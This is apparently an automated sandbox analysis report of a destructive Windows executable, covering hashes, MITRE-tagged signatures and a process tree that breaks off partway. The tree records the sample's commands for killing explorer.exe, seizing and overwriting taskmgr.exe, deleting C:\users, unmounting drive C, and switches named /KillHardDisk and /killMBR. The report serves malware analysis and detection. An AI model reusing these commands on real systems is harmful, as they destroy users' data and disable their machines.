71b664bccb566afd61da3ed7d5dadcd9717dd6083d133522f7b3b4adeffb78bd

Analysis

max time kernel
148s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20231025-en
resource tags

arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system
submitted
04/11/2023, 07:53

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

NEAS.5c7b45ea272a12bf5719812037a28900.exe
Size

3.0MB
MD5

5c7b45ea272a12bf5719812037a28900
SHA1

640c9b48a741277bda8ccab0ad98bae2c2ae9784
SHA256

71b664bccb566afd61da3ed7d5dadcd9717dd6083d133522f7b3b4adeffb78bd
SHA512

3b4834f8d46d965773a0bebc1f1b90c9b954858bde12a7813207174010baf6c96fabfd9bc33bb7b5ef15512a0cec4071a4c747a0cb6e096d09a614c222e667c7
SSDEEP

49152:j495UciMmq/NhjX5p3JOCdLAweZnE5c965nqqIP2ItdA:jk5LhzACdLAlnE5co5nqqIP2ItdA

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 27 IoCs

pid	Process
3196	NEAS.5c7b45ea272a12bf5719812037a289005.exe
2680	NEAS.5c7b45ea272a12bf5719812037a289005.exe
5052	NEAS.5c7b45ea272a12bf5719812037a289003.exe
4020	NEAS.5c7b45ea272a12bf5719812037a289005.exe
3688	NEAS.5c7b45ea272a12bf5719812037a289001.exe
1144	NEAS.5c7b45ea272a12bf5719812037a289005.exe
1208	NEAS.5c7b45ea272a12bf5719812037a289003.exe
2376	NEAS.5c7b45ea272a12bf5719812037a2890051.exe
3256	NEAS.5c7b45ea272a12bf5719812037a289003.exe
4660	NEAS.5c7b45ea272a12bf5719812037a289005.exe
2852	NEAS.5c7b45ea272a12bf5719812037a289001.exe
5064	NEAS.5c7b45ea272a12bf5719812037a289002.exe
2936	NEAS.5c7b45ea272a12bf5719812037a289003.exe
3448	NEAS.5c7b45ea272a12bf5719812037a289005.exe
1960	NEAS.5c7b45ea272a12bf5719812037a289001.exe
2512	NEAS.5c7b45ea272a12bf5719812037a289003.exe
1648	NEAS.5c7b45ea272a12bf5719812037a289005.exe
4896	NEAS.5c7b45ea272a12bf5719812037a2890051.exe
5132	NEAS.5c7b45ea272a12bf5719812037a289001.exe
5124	NEAS.5c7b45ea272a12bf5719812037a289002.exe
5376	NEAS.5c7b45ea272a12bf5719812037a2890051.exe
5560	NEAS.5c7b45ea272a12bf5719812037a2890052.exe
5620	NEAS.5c7b45ea272a12bf5719812037a2890058.exe
5612	NEAS.5c7b45ea272a12bf5719812037a2890038.exe
5948	NEAS.5c7b45ea272a12bf5719812037a289005.exe
5956	NEAS.5c7b45ea272a12bf5719812037a289001.exe
6036	NEAS.5c7b45ea272a12bf5719812037a289003.exe

Modifies file permissions 1 TTPs 15 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
12816	takeown.exe
13848	takeown.exe
6620	takeown.exe
10948	takeown.exe
5132	takeown.exe
12476	takeown.exe
7104	takeown.exe
2304	takeown.exe
4792	takeown.exe
10960	takeown.exe
12468	takeown.exe
11000	takeown.exe
10940	takeown.exe
11144	takeown.exe
7540	takeown.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Kills process with taskkill 31 IoCs

evasion

pid	Process
6608	taskkill.exe
9436	taskkill.exe
496	taskkill.exe
7580	taskkill.exe
6432	taskkill.exe
6572	taskkill.exe
8700	taskkill.exe
8788	taskkill.exe
9424	taskkill.exe
9444	taskkill.exe
9632	taskkill.exe
5008	taskkill.exe
8684	taskkill.exe
8844	taskkill.exe
3900	taskkill.exe
5008	taskkill.exe
7484	taskkill.exe
7364	taskkill.exe
7084	taskkill.exe
9468	taskkill.exe
9604	taskkill.exe
9604	taskkill.exe
10188	taskkill.exe
7632	taskkill.exe
6032	taskkill.exe
9460	taskkill.exe
8280	taskkill.exe
7388	taskkill.exe
1572	taskkill.exe
8224	taskkill.exe
4480	taskkill.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeAssignPrimaryTokenPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeLockMemoryPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeIncreaseQuotaPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeMachineAccountPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeTcbPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeSecurityPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeTakeOwnershipPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeLoadDriverPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeSystemProfilePrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeSystemtimePrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeProfSingleProcessPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeIncBasePriorityPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeCreatePagefilePrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeCreatePermanentPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeBackupPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeRestorePrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeShutdownPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeDebugPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeAuditPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeSystemEnvironmentPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeChangeNotifyPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeRemoteShutdownPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeUndockPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeSyncAgentPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeEnableDelegationPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeManageVolumePrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeImpersonatePrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeCreateGlobalPrivilege	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: 31	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: 32	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: 33	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: 34	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: 35	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeCreateTokenPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeAssignPrimaryTokenPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeLockMemoryPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeIncreaseQuotaPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeMachineAccountPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeTcbPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeSecurityPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeTakeOwnershipPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeLoadDriverPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeSystemProfilePrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeSystemtimePrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeProfSingleProcessPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeIncBasePriorityPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeCreatePagefilePrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeCreatePermanentPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeBackupPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeRestorePrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeShutdownPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeDebugPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeAuditPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeSystemEnvironmentPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeChangeNotifyPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeRemoteShutdownPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeUndockPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeSyncAgentPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeEnableDelegationPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeManageVolumePrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeImpersonatePrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: SeCreateGlobalPrivilege	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe
Token: 31	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3728 wrote to memory of 4668	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	87
PID 3728 wrote to memory of 4668	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	87
PID 4668 wrote to memory of 4812	4668	cmd.exe	88
PID 4668 wrote to memory of 4812	4668	cmd.exe	88
PID 3728 wrote to memory of 4416	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	90
PID 3728 wrote to memory of 4416	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	90
PID 4416 wrote to memory of 3956	4416	cmd.exe	91
PID 4416 wrote to memory of 3956	4416	cmd.exe	91
PID 4812 wrote to memory of 2152	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe	93
PID 4812 wrote to memory of 2152	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe	93
PID 3728 wrote to memory of 3648	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	94
PID 3728 wrote to memory of 3648	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	94
PID 4812 wrote to memory of 3888	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe	95
PID 4812 wrote to memory of 3888	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe	95
PID 3648 wrote to memory of 2908	3648	cmd.exe	96
PID 3648 wrote to memory of 2908	3648	cmd.exe	96
PID 3728 wrote to memory of 1288	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	98
PID 3728 wrote to memory of 1288	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	98
PID 3888 wrote to memory of 3196	3888	cmd.exe	99
PID 3888 wrote to memory of 3196	3888	cmd.exe	99
PID 4812 wrote to memory of 4672	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe	101
PID 4812 wrote to memory of 4672	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe	101
PID 2908 wrote to memory of 2824	2908	NEAS.5c7b45ea272a12bf5719812037a28900.exe	103
PID 2908 wrote to memory of 2824	2908	NEAS.5c7b45ea272a12bf5719812037a28900.exe	103
PID 4812 wrote to memory of 2820	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe	105
PID 4812 wrote to memory of 2820	4812	NEAS.5c7b45ea272a12bf5719812037a28900.exe	105
PID 1288 wrote to memory of 4252	1288	cmd.exe	104
PID 1288 wrote to memory of 4252	1288	cmd.exe	104
PID 3196 wrote to memory of 3400	3196	NEAS.5c7b45ea272a12bf5719812037a289005.exe	107
PID 3196 wrote to memory of 3400	3196	NEAS.5c7b45ea272a12bf5719812037a289005.exe	107
PID 3728 wrote to memory of 4332	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	108
PID 3728 wrote to memory of 4332	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	108
PID 4332 wrote to memory of 4584	4332	cmd.exe	109
PID 4332 wrote to memory of 4584	4332	cmd.exe	109
PID 3728 wrote to memory of 3752	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	111
PID 3728 wrote to memory of 3752	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	111
PID 3400 wrote to memory of 2680	3400	cmd.exe	112
PID 3400 wrote to memory of 2680	3400	cmd.exe	112
PID 2820 wrote to memory of 5052	2820	cmd.exe	113
PID 2820 wrote to memory of 5052	2820	cmd.exe	113
PID 3196 wrote to memory of 4880	3196	NEAS.5c7b45ea272a12bf5719812037a289005.exe	116
PID 3196 wrote to memory of 4880	3196	NEAS.5c7b45ea272a12bf5719812037a289005.exe	116
PID 4584 wrote to memory of 880	4584	NEAS.5c7b45ea272a12bf5719812037a28900.exe	117
PID 4584 wrote to memory of 880	4584	NEAS.5c7b45ea272a12bf5719812037a28900.exe	117
PID 3752 wrote to memory of 1972	3752	cmd.exe	118
PID 3752 wrote to memory of 1972	3752	cmd.exe	118
PID 3728 wrote to memory of 1368	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	120
PID 3728 wrote to memory of 1368	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	120
PID 5052 wrote to memory of 2568	5052	NEAS.5c7b45ea272a12bf5719812037a289003.exe	125
PID 5052 wrote to memory of 2568	5052	NEAS.5c7b45ea272a12bf5719812037a289003.exe	125
PID 2680 wrote to memory of 2492	2680	NEAS.5c7b45ea272a12bf5719812037a289005.exe	121
PID 2680 wrote to memory of 2492	2680	NEAS.5c7b45ea272a12bf5719812037a289005.exe	121
PID 4880 wrote to memory of 4020	4880	cmd.exe	122
PID 4880 wrote to memory of 4020	4880	cmd.exe	122
PID 4584 wrote to memory of 4180	4584	NEAS.5c7b45ea272a12bf5719812037a28900.exe	167
PID 4584 wrote to memory of 4180	4584	NEAS.5c7b45ea272a12bf5719812037a28900.exe	167
PID 3196 wrote to memory of 4828	3196	NEAS.5c7b45ea272a12bf5719812037a289005.exe	170
PID 3196 wrote to memory of 4828	3196	NEAS.5c7b45ea272a12bf5719812037a289005.exe	170
PID 1368 wrote to memory of 4932	1368	cmd.exe	127
PID 1368 wrote to memory of 4932	1368	cmd.exe	127
PID 4180 wrote to memory of 3688	4180	wuapihost.exe	129
PID 4180 wrote to memory of 3688	4180	wuapihost.exe	129
PID 3728 wrote to memory of 1060	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	137
PID 3728 wrote to memory of 1060	3728	NEAS.5c7b45ea272a12bf5719812037a28900.exe	137

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4668
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe /protect 1699084438
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900.exe+53210.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
      4⤵
      PID:2152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe 1699084438
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3888
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe 1699084438
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3196
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /protect 1699084438
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe /protect 1699084438
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005.exe+124706.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe
        8⤵
        
        PID:2492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe 1699084438
        8⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe 1699084438
        9⤵
        Executes dropped EXE
        
        PID:2376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe /protect 1699084438
        10⤵
        
        PID:1712
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe /protect 1699084438
        11⤵
        Executes dropped EXE
        
        PID:4896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe+022615.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe
        12⤵
        
        PID:5812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe 1699084438
        12⤵
        
        PID:6564
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe 1699084438
        13⤵
        
        PID:7432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:8400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        15⤵
        Kills process with taskkill
        
        PID:8700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /autoup 1699084438
        14⤵
        
        PID:9584
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /autoup 1699084438
        15⤵
        
        PID:10024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /killwindows 1699084438
        14⤵
        
        PID:9876
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /killwindows 1699084438
        15⤵
        
        PID:5068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        16⤵
        
        PID:5240
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        17⤵
        Modifies file permissions
        
        PID:10948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        16⤵
        
        PID:9800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /KillHardDisk 1699084438
        14⤵
        
        PID:11324
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /KillHardDisk 1699084438
        15⤵
        
        PID:4228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        16⤵
        
        PID:9500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        16⤵
        
        PID:13040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /killMBR 1699084438
        14⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /killMBR 1699084438
        15⤵
        
        PID:6904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /protect 1699084438
        14⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /protect 1699084438
        15⤵
        
        PID:7588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe+127906.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005101.exe
        16⤵
        
        PID:8572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /autoup 1699084438
        14⤵
        
        PID:5428
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe /autoup 1699084438
        15⤵
        
        PID:6844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900510.exe C:\windows\system32\taskmgr.exe
        14⤵
        
        PID:12628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe+519805.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe
        12⤵
        
        PID:6544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe 1699084438
        12⤵
        
        PID:7200
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe 1699084438
        13⤵
        
        PID:10108
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:5940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /autoup 1699084438
        14⤵
        
        PID:9356
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /autoup 1699084438
        15⤵
        
        PID:11856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:10992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /killwindows 1699084438
        14⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /killwindows 1699084438
        15⤵
        
        PID:5984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        16⤵
        
        PID:5808
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        17⤵
        Modifies file permissions
        
        PID:11000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /KillHardDisk 1699084438
        14⤵
        
        PID:8220
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /KillHardDisk 1699084438
        15⤵
        
        PID:6060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        16⤵
        
        PID:12284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /killMBR 1699084438
        14⤵
        
        PID:12064
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /killMBR 1699084438
        15⤵
        
        PID:8988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /protect 1699084438
        14⤵
        
        PID:10912
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /protect 1699084438
        15⤵
        
        PID:4780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe+715589.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289005157.exe
        16⤵
        
        PID:10272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900515.exe /autoup 1699084438
        14⤵
        
        PID:12448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe /save 1699084438
        10⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890051.exe
        
